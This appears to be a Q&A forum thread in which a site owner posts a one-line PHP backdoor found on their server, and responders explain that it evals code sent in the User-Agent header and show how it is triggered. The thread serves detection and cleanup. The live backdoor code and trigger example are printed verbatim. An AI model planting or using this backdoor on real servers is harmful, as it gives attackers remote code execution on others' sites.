0

I'm searching for your help today to get some help about a file I founded in my FTP this morning. I'm not a professionnal in all those PHP functions so this is why I post it here.

The thing I found was a file named index.php in a sub-images folder.

There is the raw code : 

<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>

The two PHP functions

For the function eval() they are saying that it is very dangerous.

Caution The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

This is why I think it might be an attempt from some one to hack my website or even more.

Any one has the capability to decode this and explain it to me?

Thx,

Patrice Poliquin
  • 373
  • 10
  • 21
  • 2
    Sidenote: `eregi` is an old deprecated function which has been replaced by `preg_match()`. If you didn't put it there, then yeah, you've been hacked. – Funk Forty Niner Oct 30 '14 at 14:21
  • 1
    `hackage` is the correct tag :? – ʰᵈˑ Oct 30 '14 at 14:24
  • 1
    As @Fred-ii- stated, if you found this piece of code in a file on your server and you did not put it there, then someone has access to your server as well. id recommend changing your password immediately – chriz Oct 30 '14 at 14:26
  • 1
    eval on `$_SERVER['HTTP_USER_AGENT']`? Yeah, it's utterly ludicrously dangerously stupid code. If you didn't write this, then you should consider your server toxic waste and act accordingly. If you did, then you really need to learn how to code securely. – Marc B Oct 30 '14 at 14:40
  • 1
    Sidenote: This may have been caused by using some form of CMS such as WordPress, Joomla etc. with an outdated/insecure plugin. Or, someone accessed your site via another backdoor which may have been your web host service's fault; I've seen that happen before. As already mentioned, change your password right away and to a much stronger one, not using common readable words. – Funk Forty Niner Oct 30 '14 at 14:48

2 Answers2

3

Yes, it's a simple eval backdoor, installed so that someone can come back at any time later and use your server for anything nefarious that they want to.

It accepts a user agent string starting with Mozilla/5.0 (3.1.final) (which is not a real user agent string), and treats the rest of the string as PHP code, which is executed via the eval call.

(The strange part is that they used the user agent for this, since that field is routinely logged in standard web logs. Using a POST field or cookie would be much more covert.)

Boann
  • 48,794
  • 16
  • 117
  • 146
2

Let's start from the begining.

  • eregi is a deprecated function as of PHP 5.3.0.
  • eregi is a case insensitive regular expression.

So, what's it doing?

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {

If final is in the HTTP_USER_AGENT, then....

Replace 'Mozilla/5.0 (3.1.final) ' with [blank] in the HTTP_USER_AGENT. And kill the script.

Conclusion

It's ineffective in terms of altering data on your site, but will render your site "dead" to anybody with the word final in their user agent - which, I think, will be all final version released of every major browser; although I cannot find any source on this.

Edit

The eval got me wondering. Since it's evident you didn't put it here, eval will evaluate code and execute it - which is a concern of an attack. The only way for somebody to get remote code to execute on your site is to "spoof" their user agent ensuring they have the phrase Mozilla/5.0 (3.1.final) in there followed by all the code they want executing. For example;

I spoof my user agent to become

Mozilla/5.0 (3.1.final)  echo 'Lol, you got hacked'

Because of the str_replace, the screen will just render the words Lol, you got hacked because eval will execute the echo. Of course, an attacker will put much more harmful commands to be evaluated. Remove this code immediately

ʰᵈˑ
  • 11,279
  • 3
  • 26
  • 49